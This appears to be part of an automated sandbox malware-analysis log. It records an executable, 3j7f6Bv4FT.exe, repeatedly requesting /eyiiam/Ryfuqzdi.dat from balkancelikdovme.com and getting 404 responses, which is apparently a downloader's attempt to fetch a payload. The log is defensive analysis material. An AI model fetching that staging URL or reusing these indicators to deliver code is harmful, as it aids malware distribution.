      2025-01-10 22:06:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      85192.168.2.449982185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:06 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:06 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:06 GMT
      vary: User-Agent
      2025-01-10 22:06:06 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      86192.168.2.449988185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:07 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:07 GMT
      vary: User-Agent
      2025-01-10 22:06:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      87192.168.2.449994185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:08 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:08 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:08 GMT
      vary: User-Agent
      2025-01-10 22:06:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      88192.168.2.450002185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:09 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:09 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:09 GMT
      vary: User-Agent
      2025-01-10 22:06:09 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      89192.168.2.450008185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:10 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:10 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:10 GMT
      vary: User-Agent
      2025-01-10 22:06:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      90192.168.2.450014185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:10 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:11 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:11 GMT
      vary: User-Agent
      2025-01-10 22:06:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      91192.168.2.450020185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:11 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:12 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:12 GMT
      vary: User-Agent
      2025-01-10 22:06:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      92192.168.2.450026185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:12 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:13 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:12 GMT
      vary: User-Agent
      2025-01-10 22:06:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      93192.168.2.450034185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:13 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:13 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:13 GMT
      vary: User-Agent
      2025-01-10 22:06:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      94192.168.2.450041185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:14 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:14 GMT
      vary: User-Agent
      2025-01-10 22:06:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      95192.168.2.450048185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:15 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:15 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:15 GMT
      vary: User-Agent
      2025-01-10 22:06:15 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      96192.168.2.450055185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:16 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:16 GMT
      vary: User-Agent
      2025-01-10 22:06:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      97192.168.2.450061185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:17 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:17 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:17 GMT
      vary: User-Agent
      2025-01-10 22:06:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      98192.168.2.450068185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:18 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:18 GMT
      vary: User-Agent
